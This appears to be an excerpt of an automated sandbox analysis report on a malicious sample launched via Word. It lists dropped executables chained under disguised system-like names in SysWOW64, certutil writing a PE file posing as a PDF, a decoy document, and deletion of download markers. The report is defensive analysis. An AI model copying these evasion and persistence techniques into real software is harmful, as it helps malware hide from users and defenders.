                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00403B4E push ecx; retf 8_2_00403B4F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00404B02 push ecx; ret 8_2_00404B03
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00403B35 push ecx; retf 8_2_00403B47
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004053DD push ecx; ret 8_2_004053E7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00408464 push ecx; ret 8_2_0040847B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00407C76 push ebp; retf 8_2_00407C78
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040A404 push ecx; ret 8_2_0040A497
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004074C5 push ecx; iretd 8_2_004074CF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004044D5 push ecx; iretd 8_2_004044F3
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004054B6 push ecx; retf 8_2_004054B7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040450F push ecx; retf 8_2_00404523
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00404539 push ecx; retf 8_2_00404523
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00406DA8 push eax; retf 8_2_00406FAF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040A646 push edx; iretd 8_2_0040A647
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00403E52 push eax; ret 8_2_00403E54
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00405655 push ecx; retf 8_2_0040565F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00407E7E push ecx; iretd 8_2_00407E7F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00409E0A push ecx; ret 8_2_00409E0B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040869A push ecx; retf 8_2_0040869B

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeExecutable created and started: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeExecutable created and started: C:\Windows\SysWOW64\capisp\jsproxy.exeJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeExecutable created and started: C:\Windows\SysWOW64\osk\rasadhlp.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeExecutable created and started: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeExecutable created and started: C:\Windows\SysWOW64\mfc110fra\mobsync.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeExecutable created and started: C:\Windows\SysWOW64\riched20\dllhost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeExecutable created and started: C:\Windows\SysWOW64\KBDMLT47\apds.exeJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeExecutable created and started: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeExecutable created and started: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeJump to behavior
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
                      Source: unknownProcess created: cmd line: ksh1.pdf
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeFile opened: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeFile opened: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeFile opened: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeFile opened: C:\Windows\SysWOW64\mfc110fra\mobsync.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeFile opened: C:\Windows\SysWOW64\capisp\jsproxy.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeFile opened: C:\Windows\SysWOW64\riched20\dllhost.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeFile opened: C:\Windows\SysWOW64\KBDMLT47\apds.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeFile opened: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeFile opened: C:\Windows\SysWOW64\osk\rasadhlp.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
